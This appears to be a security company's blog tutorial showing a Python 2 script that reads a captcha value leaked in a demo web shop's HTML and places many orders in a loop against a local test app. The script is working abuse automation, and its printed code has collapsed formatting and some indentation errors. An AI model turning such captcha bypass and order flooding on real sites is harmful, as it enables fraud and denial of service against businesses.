Blog

We specialize in Products, Application and Infrastructure security assessments and deep technical security training.

...
...

Automating Stuff with Python

Automating Stuff with Python

What is Automation?

The use of any machine or computer to perform your task efficiently and in very less time can be termed as automation.

Why do we need automated scripts?

Humans can do great stuff, but sometimes we are too lazy to perform some. For example, if I ask you to multiply 345*246 most of you people will open calculator in your devices to calculate the result, rather than using pen paper to solve it. So using automated scripts make our task easy and is less time consuming.

Ever wondered why do we need automated scripts is security testing?

If so then the answer to your question is here. While performing security testing you can across a task that needs to be done multiple times like placing 1 lakh orders to check that the application can be flooded with multiple request. Now, sitting and creating each and every request manually will be a very tough job. So, here we can use automated scripts to perform our job.

Why Python?

Python is a very powerful language containing many libraries. We can perform many powerful task using python and its libraries. So we do not need to write a lengthy code to perform a small task.

We have crafted a small web application having a feature of order placement.

The user need to select the quantity of item and then the user can place order.

Request

Response

Confirmation Page containing captcha

Request

Response

On filling the delivery address, phone number and solving captcha we can successfully place an order.

Application Challenge: Your task here is to place multiple orders near about say 100. How will you do this? I am sure you won’t be solving captcha yourself and filling the form each time. But yes you can write automated script to do this stuff.

Before starting with automation let’s have a look in the captcha code. The feature is protected by captcha. For automating order placement we need to crack this captcha. The captcha is 6 digit numeric code so brute forcing it will take a lot time. But wait, there is something fishy here.

Yeah, we got the captcha code in the HTML body. So we now can parse the HTML response and get this code which will now allow us to automate our stuff.

Let’s begin with the automation. We will follow below steps for automating.

  1. Writing code for option parser. We can use option parser to create options for our script.
  2. Writing code for using proxy, so the each and every request and response is passed and recorded in proxy.
  3. Writing code for performing GET or POST request.
  4. Writing code for parsing the response and getting captcha code from the response.

We can use below code for Option parser:

#Usage help summaryusage = "./%prog [] -p [proxy] "usage += "\nExample: ./%prog -p localhost:8080 "#Parser optionsparser = OptionParser(usage=usage)parser.add_option("-p", type="string",action="store", dest="proxy",help="HTTP Proxy ")(options, args) = parser.parse_args()

After setting the option parser we can write code for using proxy with the script.

#Proxy handlerdef getProxy():     try:        proxy_handler = urllib2.ProxyHandler({'http': options.proxy})    except(socket.timeout):        print("\tProxy timed out...\n\n")        sys.exit(1)    return proxy_handler#Test proxy connectiondef testProxy():    print("[+] Testing proxy @ %s..." % (options.proxy))    opener = urllib2.build_opener(getProxy())    try:        check = opener.open("http://www.google.com").read()    except:        check = 0        pass    if check >= 1:        print("\tProxy is found to be working...\n\n")    else:        print("\tProxy failed... Exiting!\n\n")        sys.exit(1)

Performing POST request

opener = urllib2.build_opener(getProxy(), urllib2.HTTPCookieProcessor(cj))  #Request Sent to server containing Host, Request body and request headersreq=urllib2.Request(targetURL,data,headers={})check = opener.open(req).read()

Now we have our basic work done. We have the script which can send request to the server and receive response from the server, option parser and proxy.

Our next task is to customize this script to perform our task. So we send below request to the server.

targetURL="http://127.0.0.1/blog/index.php"  #Captcha Page urldata="margherita=1&dblcheese=1&farmhouse=2&peppy=1&mexican=3&veggie=3&pepper=1&paradise=1"  #Request body for captcha pagerespHTML = postServerResponse(cj, targetURL, data) #performing post request

Parse the response and get captcha code from it.

captcha=re.search("(php\?rand=)(\d+)",respHTML)

Now with this captcha code we will again send the post request to the server.

targetURL1="http://127.0.0.1/blog/checkout.php" #Captcha is submitted to this urldata1="margherita=1&dblcheese=1&farmhouse=2&peppy=1&mexican=3&veggie=3&pepper=1&paradise=1&address=sdassdce&phn="+str(rand)+"&city=sdcefv&state=rferv&captcha_code="+captcha.group(2) # request body for order placementrespHTML1= postServerResponse(cj, targetURL1, data1)

Parse the new response received to get the order id of the successful order placed.

if re.search("successfully",respHTML1):        id1=re.search("(order id )(\d+)",resp)        print "Order Placed successfully with order id: "+id1.group(2)else:        print "Order Not Placed"

By combining all the modules we get below script:

#!/usr/bin/python# Import Startsimport sysimport socketimport urllibimport reimport urllib2import stringimport timeimport httplibimport randomfrom optparse import OptionParserfrom cookielib import CookieJar# Import Ends#Usage help summaryusage = "./%prog [] -p [proxy] "usage += "\nExample: ./%prog -p localhost:8080 "#Parser options parser = OptionParser(usage=usage)parser.add_option("-p", type="string",action="store", dest="proxy",help="HTTP Proxy ")(options, args) = parser.parse_args()      #Proxy handlerdef getProxy():     try:        proxy_handler = urllib2.ProxyHandler({'http': options.proxy})    except(socket.timeout):        print("\tProxy timed out...\n\n")        sys.exit(1)    return proxy_handler#Test proxy connectiondef testProxy():    print("[+] Testing proxy @ %s..." % (options.proxy))    opener = urllib2.build_opener(getProxy())    try:        check = opener.open("http://www.google.com").read()    except:        check = 0        pass    if check >= 1:        print("\tProxy is found to be working...")    else:        print("\tProxy failed... Exiting!")        sys.exit(1)#Post data to server using POST requestdef postServerResponse(cj, targetURL, data):    if options.proxy:        try:            opener = urllib2.build_opener(getProxy(), urllib2.HTTPCookieProcessor(cj))              #Request Sent to server containing Host, Request body and request headers            req=urllib2.Request(targetURL,data,headers={})            check = opener.open(req).read()            return check        except:            print("\tProxy connection failed to remote target...")            sys.exit(1)    else:        try:            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))            req=urllib2.Request(targetURL,data,headers={})            check = opener.open(req).read()            return check        except:            print("\tTarget connection failed, check your address...")            sys.exit(1)#Try to Place Orderdef placeOrder():    cj = CookieJar()    opener=urllib2.build_opener(getProxy(), urllib2.HTTPCookieProcessor(cj))    targetURL="http://127.0.0.1/blog/index.php" #Captcha Page url    targetURL1="http://127.0.0.1/blog/checkout.php" #Captcha is submitted to this url    data="margherita=1&dblcheese=1&farmhouse=2&peppy=1&mexican=3&veggie=3&pepper=1&paradise=1" #Request body for captcha page    respHTML = postServerResponse(cj, targetURL, data)    captcha=re.search("(php\?rand=)(\d+)",respHTML)    if captcha:        rand=random.randint(7000000000,9999999999)      data1="margherita=1&dblcheese=1&farmhouse=2&peppy=1&mexican=3&veggie=3&pepper=1&paradise=1&address=sdassdce&phn="+str(rand)+"&city=sdcefv&state=rferv&captcha_code="+captcha.group(2) # request body for order placement      respHTML1= postServerResponse(cj, targetURL1, data1)      resp=respHTML1      if re.search("successfully",respHTML1):        id1=re.search("(order id )(\d+)",resp)        print "Order Placed successfully with order id: "+id1.group(2)      else:        print "Order Not Placed"     else:      print "Captcha not found"         #Main function      def main():   # Check and connect proxy server if specified using -p argument  if options.proxy:    testProxy()  print("\n[+] Running Test...")  loop=input("Enter number of orders to be placed:")  for i in range(0,loop):    placeOrder()   print("\n[+] Automated Order Placement. Have fun!...")    if __name__ == "__main__":    main()

Below is the screenshot for script for placing 30 orders:

References:

  1. http://www.dreamsyssoft.com/python-scripting-tutorial/optionparser-tutorial.php
  2. https://docs.python.org/2/library/urllib2.html#urllib2.ProxyHandler
  3. http://www.geeksforgeeks.org/get-post-requests-using-python/